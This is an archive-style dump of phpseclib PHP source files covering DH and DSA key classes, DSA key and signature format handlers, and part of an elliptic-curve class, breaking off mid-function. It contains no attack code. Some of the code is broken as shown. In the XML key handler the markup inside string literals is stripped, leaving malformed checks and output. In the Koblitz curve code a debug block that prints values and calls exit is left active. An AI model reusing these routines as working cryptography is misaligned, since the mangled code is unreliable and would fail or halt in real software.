*/ namespace phpseclib3\Crypt\DH; use phpseclib3\Crypt\Common; use phpseclib3\Crypt\DH; /** * DH Public Key * * @author Jim Wigginton */ final class PublicKey extends DH { use Common\Traits\Fingerprint; /** * Returns the public key * * @param string $type * @param array $options optional * @return string */ public function toString($type, array $options = []) { $type = self::validatePlugin('Keys', $type, 'savePublicKey'); return $type::savePublicKey($this->prime, $this->base, $this->publicKey, $options); } /** * Returns the public key as a BigInteger * * @return \phpseclib3\Math\BigInteger */ public function toBigInteger() { return $this->publicKey; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DSA/Formats/Keys/PKCS1.php000064400000007767147600400120023362 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\DSA\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common\Formats\Keys\PKCS1 as Progenitor; use phpseclib3\File\ASN1; use phpseclib3\File\ASN1\Maps; use phpseclib3\Math\BigInteger; /** * PKCS#1 Formatted DSA Key Handler * * @author Jim Wigginton */ abstract class PKCS1 extends Progenitor { /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $key = parent::load($key, $password); $decoded = ASN1::decodeBER($key); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $key = ASN1::asn1map($decoded[0], Maps\DSAParams::MAP); if (is_array($key)) { return $key; } $key = ASN1::asn1map($decoded[0], Maps\DSAPrivateKey::MAP); if (is_array($key)) { return $key; } $key = ASN1::asn1map($decoded[0], Maps\DSAPublicKey::MAP); if (is_array($key)) { return $key; } throw new \RuntimeException('Unable to perform ASN1 mapping'); } /** * Convert DSA parameters to the appropriate format * * @param \phpseclib3\Math\BigInteger $p * @param \phpseclib3\Math\BigInteger $q * @param \phpseclib3\Math\BigInteger $g * @return string */ public static function saveParameters(BigInteger $p, BigInteger $q, BigInteger $g) { $key = [ 'p' => $p, 'q' => $q, 'g' => $g ]; $key = ASN1::encodeDER($key, Maps\DSAParams::MAP); return "-----BEGIN DSA PARAMETERS-----\r\n" . chunk_split(Strings::base64_encode($key), 64) . "-----END DSA PARAMETERS-----\r\n"; } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $p * @param \phpseclib3\Math\BigInteger $q * @param \phpseclib3\Math\BigInteger $g * @param \phpseclib3\Math\BigInteger $y * @param \phpseclib3\Math\BigInteger $x * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(BigInteger $p, BigInteger $q, BigInteger $g, BigInteger $y, BigInteger $x, $password = '', array $options = []) { $key = [ 'version' => 0, 'p' => $p, 'q' => $q, 'g' => $g, 'y' => $y, 'x' => $x ]; $key = ASN1::encodeDER($key, Maps\DSAPrivateKey::MAP); return self::wrapPrivateKey($key, 'DSA', $password, $options); } /** * Convert a public key to the appropriate format * * @param \phpseclib3\Math\BigInteger $p * @param \phpseclib3\Math\BigInteger $q * @param \phpseclib3\Math\BigInteger $g * @param \phpseclib3\Math\BigInteger $y * @return string */ public static function savePublicKey(BigInteger $p, BigInteger $q, BigInteger $g, BigInteger $y) { $key = ASN1::encodeDER($y, Maps\DSAPublicKey::MAP); return self::wrapPublicKey($key, 'DSA'); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DSA/Formats/Keys/Raw.php000064400000004775147600400120023266 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\DSA\Formats\Keys; use phpseclib3\Math\BigInteger; /** * Raw DSA Key Handler * * @author Jim Wigginton */ abstract class Raw { /** * Break a public or private key down into its constituent components * * @param array $key * @param string $password optional * @return array */ public static function load($key, $password = '') { if (!is_array($key)) { throw new \UnexpectedValueException('Key should be a array - not a ' . gettype($key)); } switch (true) { case !isset($key['p']) || !isset($key['q']) || !isset($key['g']): case !$key['p'] instanceof BigInteger: case !$key['q'] instanceof BigInteger: case !$key['g'] instanceof BigInteger: case !isset($key['x']) && !isset($key['y']): case isset($key['x']) && !$key['x'] instanceof BigInteger: case isset($key['y']) && !$key['y'] instanceof BigInteger: throw new \UnexpectedValueException('Key appears to be malformed'); } $options = ['p' => 1, 'q' => 1, 'g' => 1, 'x' => 1, 'y' => 1]; return array_intersect_key($key, $options); } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $p * @param \phpseclib3\Math\BigInteger $q * @param \phpseclib3\Math\BigInteger $g * @param \phpseclib3\Math\BigInteger $y * @param \phpseclib3\Math\BigInteger $x * @param string $password optional * @return string */ public static function savePrivateKey(BigInteger $p, BigInteger $q, BigInteger $g, BigInteger $y, BigInteger $x, $password = '') { return compact('p', 'q', 'g', 'y', 'x'); } /** * Convert a public key to the appropriate format * * @param \phpseclib3\Math\BigInteger $p * @param \phpseclib3\Math\BigInteger $q * @param \phpseclib3\Math\BigInteger $g * @param \phpseclib3\Math\BigInteger $y * @return string */ public static function savePublicKey(BigInteger $p, BigInteger $q, BigInteger $g, BigInteger $y) { return compact('p', 'q', 'g', 'y'); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DSA/Formats/Keys/OpenSSH.php000064400000007232147600400120024003 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\DSA\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common\Formats\Keys\OpenSSH as Progenitor; use phpseclib3\Math\BigInteger; /** * OpenSSH Formatted DSA Key Handler * * @author Jim Wigginton */ abstract class OpenSSH extends Progenitor { /** * Supported Key Types * * @var array */ protected static $types = ['ssh-dss']; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $parsed = parent::load($key, $password); if (isset($parsed['paddedKey'])) { list($type) = Strings::unpackSSH2('s', $parsed['paddedKey']); if ($type != $parsed['type']) { throw new \RuntimeException("The public and private keys are not of the same type ($type vs $parsed[type])"); } list($p, $q, $g, $y, $x, $comment) = Strings::unpackSSH2('i5s', $parsed['paddedKey']); return compact('p', 'q', 'g', 'y', 'x', 'comment'); } list($p, $q, $g, $y) = Strings::unpackSSH2('iiii', $parsed['publicKey']); $comment = $parsed['comment']; return compact('p', 'q', 'g', 'y', 'comment'); } /** * Convert a public key to the appropriate format * * @param \phpseclib3\Math\BigInteger $p * @param \phpseclib3\Math\BigInteger $q * @param \phpseclib3\Math\BigInteger $g * @param \phpseclib3\Math\BigInteger $y * @param array $options optional * @return string */ public static function savePublicKey(BigInteger $p, BigInteger $q, BigInteger $g, BigInteger $y, array $options = []) { if ($q->getLength() != 160) { throw new \InvalidArgumentException('SSH only supports keys with an N (length of Group Order q) of 160'); } // from : // string "ssh-dss" // mpint p // mpint q // mpint g // mpint y $DSAPublicKey = Strings::packSSH2('siiii', 'ssh-dss', $p, $q, $g, $y); if (isset($options['binary']) ? $options['binary'] : self::$binary) { return $DSAPublicKey; } $comment = isset($options['comment']) ? $options['comment'] : self::$comment; $DSAPublicKey = 'ssh-dss ' . base64_encode($DSAPublicKey) . ' ' . $comment; return $DSAPublicKey; } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $p * @param \phpseclib3\Math\BigInteger $q * @param \phpseclib3\Math\BigInteger $g * @param \phpseclib3\Math\BigInteger $y * @param \phpseclib3\Math\BigInteger $x * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(BigInteger $p, BigInteger $q, BigInteger $g, BigInteger $y, BigInteger $x, $password = '', array $options = []) { $publicKey = self::savePublicKey($p, $q, $g, $y, ['binary' => true]); $privateKey = Strings::packSSH2('si5', 'ssh-dss', $p, $q, $g, $y, $x); return self::wrapPrivateKey($publicKey, $privateKey, $password, $options); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DSA/Formats/Keys/PuTTY.php000064400000006576147600400120023523 0ustar00 160 kinda useless, hence this handlers not supporting such keys. * * PHP version 5 * * @author Jim Wigginton * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\DSA\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common\Formats\Keys\PuTTY as Progenitor; use phpseclib3\Math\BigInteger; /** * PuTTY Formatted DSA Key Handler * * @author Jim Wigginton */ abstract class PuTTY extends Progenitor { /** * Public Handler * * @var string */ const PUBLIC_HANDLER = 'phpseclib3\Crypt\DSA\Formats\Keys\OpenSSH'; /** * Algorithm Identifier * * @var array */ protected static $types = ['ssh-dss']; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $components = parent::load($key, $password); if (!isset($components['private'])) { return $components; } extract($components); unset($components['public'], $components['private']); list($p, $q, $g, $y) = Strings::unpackSSH2('iiii', $public); list($x) = Strings::unpackSSH2('i', $private); return compact('p', 'q', 'g', 'y', 'x', 'comment'); } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $p * @param \phpseclib3\Math\BigInteger $q * @param \phpseclib3\Math\BigInteger $g * @param \phpseclib3\Math\BigInteger $y * @param \phpseclib3\Math\BigInteger $x * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(BigInteger $p, BigInteger $q, BigInteger $g, BigInteger $y, BigInteger $x, $password = false, array $options = []) { if ($q->getLength() != 160) { throw new \InvalidArgumentException('SSH only supports keys with an N (length of Group Order q) of 160'); } $public = Strings::packSSH2('iiii', $p, $q, $g, $y); $private = Strings::packSSH2('i', $x); return self::wrapPrivateKey($public, $private, 'ssh-dss', $password, $options); } /** * Convert a public key to the appropriate format * * @param \phpseclib3\Math\BigInteger $p * @param \phpseclib3\Math\BigInteger $q * @param \phpseclib3\Math\BigInteger $g * @param \phpseclib3\Math\BigInteger $y * @return string */ public static function savePublicKey(BigInteger $p, BigInteger $q, BigInteger $g, BigInteger $y) { if ($q->getLength() != 160) { throw new \InvalidArgumentException('SSH only supports keys with an N (length of Group Order q) of 160'); } return self::wrapPublicKey(Strings::packSSH2('iiii', $p, $q, $g, $y), 'ssh-dss'); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DSA/Formats/Keys/PKCS8.php000064400000010401147600400120023344 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\DSA\Formats\Keys; use phpseclib3\Crypt\Common\Formats\Keys\PKCS8 as Progenitor; use phpseclib3\File\ASN1; use phpseclib3\File\ASN1\Maps; use phpseclib3\Math\BigInteger; /** * PKCS#8 Formatted DSA Key Handler * * @author Jim Wigginton */ abstract class PKCS8 extends Progenitor { /** * OID Name * * @var string */ const OID_NAME = 'id-dsa'; /** * OID Value * * @var string */ const OID_VALUE = '1.2.840.10040.4.1'; /** * Child OIDs loaded * * @var bool */ protected static $childOIDsLoaded = false; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $key = parent::load($key, $password); $type = isset($key['privateKey']) ? 'privateKey' : 'publicKey'; $decoded = ASN1::decodeBER($key[$type . 'Algorithm']['parameters']->element); if (!$decoded) { throw new \RuntimeException('Unable to decode BER of parameters'); } $components = ASN1::asn1map($decoded[0], Maps\DSAParams::MAP); if (!is_array($components)) { throw new \RuntimeException('Unable to perform ASN1 mapping on parameters'); } $decoded = ASN1::decodeBER($key[$type]); if (empty($decoded)) { throw new \RuntimeException('Unable to decode BER'); } $var = $type == 'privateKey' ? 'x' : 'y'; $components[$var] = ASN1::asn1map($decoded[0], Maps\DSAPublicKey::MAP); if (!$components[$var] instanceof BigInteger) { throw new \RuntimeException('Unable to perform ASN1 mapping'); } if (isset($key['meta'])) { $components['meta'] = $key['meta']; } return $components; } /** * Convert a private key to the appropriate format. * * @param \phpseclib3\Math\BigInteger $p * @param \phpseclib3\Math\BigInteger $q * @param \phpseclib3\Math\BigInteger $g * @param \phpseclib3\Math\BigInteger $y * @param \phpseclib3\Math\BigInteger $x * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(BigInteger $p, BigInteger $q, BigInteger $g, BigInteger $y, BigInteger $x, $password = '', array $options = []) { $params = [ 'p' => $p, 'q' => $q, 'g' => $g ]; $params = ASN1::encodeDER($params, Maps\DSAParams::MAP); $params = new ASN1\Element($params); $key = ASN1::encodeDER($x, Maps\DSAPublicKey::MAP); return self::wrapPrivateKey($key, [], $params, $password, null, '', $options); } /** * Convert a public key to the appropriate format * * @param \phpseclib3\Math\BigInteger $p * @param \phpseclib3\Math\BigInteger $q * @param \phpseclib3\Math\BigInteger $g * @param \phpseclib3\Math\BigInteger $y * @param array $options optional * @return string */ public static function savePublicKey(BigInteger $p, BigInteger $q, BigInteger $g, BigInteger $y, array $options = []) { $params = [ 'p' => $p, 'q' => $q, 'g' => $g ]; $params = ASN1::encodeDER($params, Maps\DSAParams::MAP); $params = new ASN1\Element($params); $key = ASN1::encodeDER($y, Maps\DSAPublicKey::MAP); return self::wrapPublicKey($key, $params); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DSA/Formats/Keys/XML.php000064400000012121147600400120023155 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\DSA\Formats\Keys; use phpseclib3\Common\Functions\Strings; use phpseclib3\Exception\BadConfigurationException; use phpseclib3\Math\BigInteger; /** * XML Formatted DSA Key Handler * * @author Jim Wigginton */ abstract class XML { /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { if (!Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . gettype($key)); } if (!class_exists('DOMDocument')) { throw new BadConfigurationException('The dom extension is not setup correctly on this system'); } $use_errors = libxml_use_internal_errors(true); $dom = new \DOMDocument(); if (substr($key, 0, 5) != '' . $key . ''; } if (!$dom->loadXML($key)) { libxml_use_internal_errors($use_errors); throw new \UnexpectedValueException('Key does not appear to contain XML'); } $xpath = new \DOMXPath($dom); $keys = ['p', 'q', 'g', 'y', 'j', 'seed', 'pgencounter']; foreach ($keys as $key) { // $dom->getElementsByTagName($key) is case-sensitive $temp = $xpath->query("//*[translate(local-name(), 'ABCDEFGHIJKLMNOPQRSTUVWXYZ','abcdefghijklmnopqrstuvwxyz')='$key']"); if (!$temp->length) { continue; } $value = new BigInteger(Strings::base64_decode($temp->item(0)->nodeValue), 256); switch ($key) { case 'p': // a prime modulus meeting the [DSS] requirements // Parameters P, Q, and G can be public and common to a group of users. They might be known // from application context. As such, they are optional but P and Q must either both appear // or both be absent $components['p'] = $value; break; case 'q': // an integer in the range 2**159 < Q < 2**160 which is a prime divisor of P-1 $components['q'] = $value; break; case 'g': // an integer with certain properties with respect to P and Q $components['g'] = $value; break; case 'y': // G**X mod P (where X is part of the private key and not made public) $components['y'] = $value; // the remaining options do not do anything case 'j': // (P - 1) / Q // Parameter J is available for inclusion solely for efficiency as it is calculatable from // P and Q case 'seed': // a DSA prime generation seed // Parameters seed and pgenCounter are used in the DSA prime number generation algorithm // specified in [DSS]. As such, they are optional but must either both be present or both // be absent case 'pgencounter': // a DSA prime generation counter } } libxml_use_internal_errors($use_errors); if (!isset($components['y'])) { throw new \UnexpectedValueException('Key is missing y component'); } switch (true) { case !isset($components['p']): case !isset($components['q']): case !isset($components['g']): return ['y' => $components['y']]; } return $components; } /** * Convert a public key to the appropriate format * * See https://www.w3.org/TR/xmldsig-core/#sec-DSAKeyValue * * @param \phpseclib3\Math\BigInteger $p * @param \phpseclib3\Math\BigInteger $q * @param \phpseclib3\Math\BigInteger $g * @param \phpseclib3\Math\BigInteger $y * @return string */ public static function savePublicKey(BigInteger $p, BigInteger $q, BigInteger $g, BigInteger $y) { return "\r\n" . '

' . Strings::base64_encode($p->toBytes()) . "

\r\n" . ' ' . Strings::base64_encode($q->toBytes()) . "\r\n" . ' ' . Strings::base64_encode($g->toBytes()) . "\r\n" . ' ' . Strings::base64_encode($y->toBytes()) . "\r\n" . '
'; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DSA/Formats/Signature/SSH2.php000064400000003313147600400120024265 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\DSA\Formats\Signature; use phpseclib3\Common\Functions\Strings; use phpseclib3\Math\BigInteger; /** * SSH2 Signature Handler * * @author Jim Wigginton */ abstract class SSH2 { /** * Loads a signature * * @param string $sig * @return mixed */ public static function load($sig) { if (!is_string($sig)) { return false; } $result = Strings::unpackSSH2('ss', $sig); if ($result === false) { return false; } list($type, $blob) = $result; if ($type != 'ssh-dss' || strlen($blob) != 40) { return false; } return [ 'r' => new BigInteger(substr($blob, 0, 20), 256), 's' => new BigInteger(substr($blob, 20), 256) ]; } /** * Returns a signature in the appropriate format * * @param \phpseclib3\Math\BigInteger $r * @param \phpseclib3\Math\BigInteger $s * @return string */ public static function save(BigInteger $r, BigInteger $s) { if ($r->getLength() > 160 || $s->getLength() > 160) { return false; } return Strings::packSSH2( 'ss', 'ssh-dss', str_pad($r->toBytes(), 20, "\0", STR_PAD_LEFT) . str_pad($s->toBytes(), 20, "\0", STR_PAD_LEFT) ); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DSA/Formats/Signature/Raw.php000064400000001012147600400120024271 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\DSA\Formats\Signature; use phpseclib3\Crypt\Common\Formats\Signature\Raw as Progenitor; /** * Raw DSA Signature Handler * * @author Jim Wigginton */ abstract class Raw extends Progenitor { } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DSA/Formats/Signature/ASN1.php000064400000002606147600400120024254 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\DSA\Formats\Signature; use phpseclib3\File\ASN1 as Encoder; use phpseclib3\File\ASN1\Maps; use phpseclib3\Math\BigInteger; /** * ASN1 Signature Handler * * @author Jim Wigginton */ abstract class ASN1 { /** * Loads a signature * * @param string $sig * @return array|bool */ public static function load($sig) { if (!is_string($sig)) { return false; } $decoded = Encoder::decodeBER($sig); if (empty($decoded)) { return false; } $components = Encoder::asn1map($decoded[0], Maps\DssSigValue::MAP); return $components; } /** * Returns a signature in the appropriate format * * @param \phpseclib3\Math\BigInteger $r * @param \phpseclib3\Math\BigInteger $s * @return string */ public static function save(BigInteger $r, BigInteger $s) { return Encoder::encodeDER(compact('r', 's'), Maps\DssSigValue::MAP); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DSA/PrivateKey.php000064400000011361147600400120022257 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\DSA; use phpseclib3\Crypt\Common; use phpseclib3\Crypt\DSA; use phpseclib3\Crypt\DSA\Formats\Signature\ASN1 as ASN1Signature; use phpseclib3\Math\BigInteger; /** * DSA Private Key * * @author Jim Wigginton */ final class PrivateKey extends DSA implements Common\PrivateKey { use Common\Traits\PasswordProtected; /** * DSA secret exponent x * * @var \phpseclib3\Math\BigInteger */ protected $x; /** * Returns the public key * * If you do "openssl rsa -in private.rsa -pubout -outform PEM" you get a PKCS8 formatted key * that contains a publicKeyAlgorithm AlgorithmIdentifier and a publicKey BIT STRING. * An AlgorithmIdentifier contains an OID and a parameters field. With RSA public keys this * parameters field is NULL. With DSA PKCS8 public keys it is not - it contains the p, q and g * variables. The publicKey BIT STRING contains, simply, the y variable. This can be verified * by getting a DSA PKCS8 public key: * * "openssl dsa -in private.dsa -pubout -outform PEM" * * ie. just swap out rsa with dsa in the rsa command above. * * A PKCS1 public key corresponds to the publicKey portion of the PKCS8 key. In the case of RSA * the publicKey portion /is/ the key. In the case of DSA it is not. You cannot verify a signature * without the parameters and the PKCS1 DSA public key format does not include the parameters. * * @see self::getPrivateKey() * @return mixed */ public function getPublicKey() { $type = self::validatePlugin('Keys', 'PKCS8', 'savePublicKey'); if (!isset($this->y)) { $this->y = $this->g->powMod($this->x, $this->p); } $key = $type::savePublicKey($this->p, $this->q, $this->g, $this->y); return DSA::loadFormat('PKCS8', $key) ->withHash($this->hash->getHash()) ->withSignatureFormat($this->shortFormat); } /** * Create a signature * * @see self::verify() * @param string $message * @return mixed */ public function sign($message) { $format = $this->sigFormat; if (self::$engines['OpenSSL'] && in_array($this->hash->getHash(), openssl_get_md_methods())) { $signature = ''; $result = openssl_sign($message, $signature, $this->toString('PKCS8'), $this->hash->getHash()); if ($result) { if ($this->shortFormat == 'ASN1') { return $signature; } extract(ASN1Signature::load($signature)); return $format::save($r, $s); } } $h = $this->hash->hash($message); $h = $this->bits2int($h); while (true) { $k = BigInteger::randomRange(self::$one, $this->q->subtract(self::$one)); $r = $this->g->powMod($k, $this->p); list(, $r) = $r->divide($this->q); if ($r->equals(self::$zero)) { continue; } $kinv = $k->modInverse($this->q); $temp = $h->add($this->x->multiply($r)); $temp = $kinv->multiply($temp); list(, $s) = $temp->divide($this->q); if (!$s->equals(self::$zero)) { break; } } // the following is an RFC6979 compliant implementation of deterministic DSA // it's unused because it's mainly intended for use when a good CSPRNG isn't // available. if phpseclib's CSPRNG isn't good then even key generation is // suspect /* $h1 = $this->hash->hash($message); $k = $this->computek($h1); $r = $this->g->powMod($k, $this->p); list(, $r) = $r->divide($this->q); $kinv = $k->modInverse($this->q); $h1 = $this->bits2int($h1); $temp = $h1->add($this->x->multiply($r)); $temp = $kinv->multiply($temp); list(, $s) = $temp->divide($this->q); */ return $format::save($r, $s); } /** * Returns the private key * * @param string $type * @param array $options optional * @return string */ public function toString($type, array $options = []) { $type = self::validatePlugin('Keys', $type, 'savePrivateKey'); if (!isset($this->y)) { $this->y = $this->g->powMod($this->x, $this->p); } return $type::savePrivateKey($this->p, $this->q, $this->g, $this->y, $this->x, $this->password, $options); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DSA/Parameters.php000064400000001427147600400120022301 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\DSA; use phpseclib3\Crypt\DSA; /** * DSA Parameters * * @author Jim Wigginton */ final class Parameters extends DSA { /** * Returns the parameters * * @param string $type * @param array $options optional * @return string */ public function toString($type = 'PKCS1', array $options = []) { $type = self::validatePlugin('Keys', 'PKCS1', 'saveParameters'); return $type::saveParameters($this->p, $this->q, $this->g, $options); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/DSA/PublicKey.php000064400000004511147600400120022062 0ustar00 * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt\DSA; use phpseclib3\Crypt\Common; use phpseclib3\Crypt\DSA; use phpseclib3\Crypt\DSA\Formats\Signature\ASN1 as ASN1Signature; /** * DSA Public Key * * @author Jim Wigginton */ final class PublicKey extends DSA implements Common\PublicKey { use Common\Traits\Fingerprint; /** * Verify a signature * * @see self::verify() * @param string $message * @param string $signature * @return mixed */ public function verify($message, $signature) { $format = $this->sigFormat; $params = $format::load($signature); if ($params === false || count($params) != 2) { return false; } extract($params); if (self::$engines['OpenSSL'] && in_array($this->hash->getHash(), openssl_get_md_methods())) { $sig = $format != 'ASN1' ? ASN1Signature::save($r, $s) : $signature; $result = openssl_verify($message, $sig, $this->toString('PKCS8'), $this->hash->getHash()); if ($result != -1) { return (bool) $result; } } $q_1 = $this->q->subtract(self::$one); if (!$r->between(self::$one, $q_1) || !$s->between(self::$one, $q_1)) { return false; } $w = $s->modInverse($this->q); $h = $this->hash->hash($message); $h = $this->bits2int($h); list(, $u1) = $h->multiply($w)->divide($this->q); list(, $u2) = $r->multiply($w)->divide($this->q); $v1 = $this->g->powMod($u1, $this->p); $v2 = $this->y->powMod($u2, $this->p); list(, $v) = $v1->multiply($v2)->divide($this->p); list(, $v) = $v->divide($this->q); return $v->equals($r); } /** * Returns the public key * * @param string $type * @param array $options optional * @return string */ public function toString($type, array $options = []) { $type = self::validatePlugin('Keys', $type, 'savePublicKey'); return $type::savePublicKey($this->p, $this->q, $this->g, $this->y, $options); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/EC/BaseCurves/KoblitzPrime.php000064400000023675147600400120024544 0ustar00 * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace phpseclib3\Crypt\EC\BaseCurves; use phpseclib3\Math\BigInteger; use phpseclib3\Math\PrimeField; /** * Curves over y^2 = x^3 + b * * @author Jim Wigginton */ class KoblitzPrime extends Prime { /** * Basis * * @var list */ protected $basis; /** * Beta * * @var PrimeField\Integer */ protected $beta; // don't overwrite setCoefficients() with one that only accepts one parameter so that // one might be able to switch between KoblitzPrime and Prime more easily (for benchmarking // purposes). /** * Multiply and Add Points * * Uses a efficiently computable endomorphism to achieve a slight speedup * * Adapted from: * https://github.com/indutny/elliptic/blob/725bd91/lib/elliptic/curve/short.js#L219 * * @return int[] */ public function multiplyAddPoints(array $points, array $scalars) { static $zero, $one, $two; if (!isset($two)) { $two = new BigInteger(2); $one = new BigInteger(1); } if (!isset($this->beta)) { // get roots $inv = $this->one->divide($this->two)->negate(); $s = $this->three->negate()->squareRoot()->multiply($inv); $betas = [ $inv->add($s), $inv->subtract($s) ]; $this->beta = $betas[0]->compare($betas[1]) < 0 ? $betas[0] : $betas[1]; //echo strtoupper($this->beta->toHex(true)) . "\n"; exit; } if (!isset($this->basis)) { $factory = new PrimeField($this->order); $tempOne = $factory->newInteger($one); $tempTwo = $factory->newInteger($two); $tempThree = $factory->newInteger(new BigInteger(3)); $inv = $tempOne->divide($tempTwo)->negate(); $s = $tempThree->negate()->squareRoot()->multiply($inv); $lambdas = [ $inv->add($s), $inv->subtract($s) ]; $lhs = $this->multiplyPoint($this->p, $lambdas[0])[0]; $rhs = $this->p[0]->multiply($this->beta); $lambda = $lhs->equals($rhs) ? $lambdas[0] : $lambdas[1]; $this->basis = static::extendedGCD($lambda->toBigInteger(), $this->order); ///* foreach ($this->basis as $basis) { echo strtoupper($basis['a']->toHex(true)) . "\n"; echo strtoupper($basis['b']->toHex(true)) . "\n\n"; } exit; //*/ } $npoints = $nscalars = []; for ($i = 0; $i < count($points); $i++) { $p = $points[$i]; $k = $scalars[$i]->toBigInteger(); // begin split list($v1, $v2) = $this->basis; $c1 = $v2['b']->multiply($k); list($c1, $r) = $c1->divide($this->order); if ($this->order->compare($r->multiply($two)) <= 0) { $c1 = $c1->add($one); } $c2 = $v1['b']->negate()->multiply($k); list($c2, $r) = $c2->divide($this->order); if ($this->order->compare($r->multiply($two)) <= 0) { $c2 = $c2->add($one); } $p1 = $c1->multiply($v1['a']); $p2 = $c2->multiply($v2['a']); $q1 = $c1->multiply($v1['b']); $q2 = $c2->multiply($v2['b']); $k1 = $k->subtract($p1)->subtract($p2); $k2 = $q1->add($q2)->negate(); // end split $beta = [ $p[0]->multiply($this->beta), $p[1], clone $this->one ]; if (isset($p['naf'])) { $beta['naf'] = array_map(function ($p) { return [ $p[0]->multiply($this->beta), $p[1], clone $this->one ]; }, $p['naf']); $beta['nafwidth'] = $p['nafwidth']; } if ($k1->isNegative()) { $k1 = $k1->negate(); $p = $this->negatePoint($p); } if ($k2->isNegative()) { $k2 = $k2->negate(); $beta = $this->negatePoint($beta); } $pos = 2 * $i; $npoints[$pos] = $p; $nscalars[$pos] = $this->factory->newInteger($k1); $pos++; $npoints[$pos] = $beta; $nscalars[$pos] = $this->factory->newInteger($k2); } return parent::multiplyAddPoints($npoints, $nscalars); } /** * Returns the numerator and denominator of the slope * * @return FiniteField[] */ protected function doublePointHelper(array $p) { $numerator = $this->three->multiply($p[0])->multiply($p[0]); $denominator = $this->two->multiply($p[1]); return [$numerator, $denominator]; } /** * Doubles a jacobian coordinate on the curve * * See http://hyperelliptic.org/EFD/g1p/auto-shortw-jacobian-0.html#doubling-dbl-2009-l * * @return FiniteField[] */ protected function jacobianDoublePoint(array $p) { list($x1, $y1, $z1) = $p; $a = $x1->multiply($x1); $b = $y1->multiply($y1); $c = $b->multiply($b); $d = $x1->add($b); $d = $d->multiply($d)->subtract($a)->subtract($c)->multiply($this->two); $e = $this->three->multiply($a); $f = $e->multiply($e); $x3 = $f->subtract($this->two->multiply($d)); $y3 = $e->multiply($d->subtract($x3))->subtract( $this->eight->multiply($c) ); $z3 = $this->two->multiply($y1)->multiply($z1); return [$x3, $y3, $z3]; } /** * Doubles a "fresh" jacobian coordinate on the curve * * See http://hyperelliptic.org/EFD/g1p/auto-shortw-jacobian-0.html#doubling-mdbl-2007-bl * * @return FiniteField[] */ protected function jacobianDoublePointMixed(array $p) { list($x1, $y1) = $p; $xx = $x1->multiply($x1); $yy = $y1->multiply($y1); $yyyy = $yy->multiply($yy); $s = $x1->add($yy); $s = $s->multiply($s)->subtract($xx)->subtract($yyyy)->multiply($this->two); $m = $this->three->multiply($xx); $t = $m->multiply($m)->subtract($this->two->multiply($s)); $x3 = $t; $y3 = $s->subtract($t); $y3 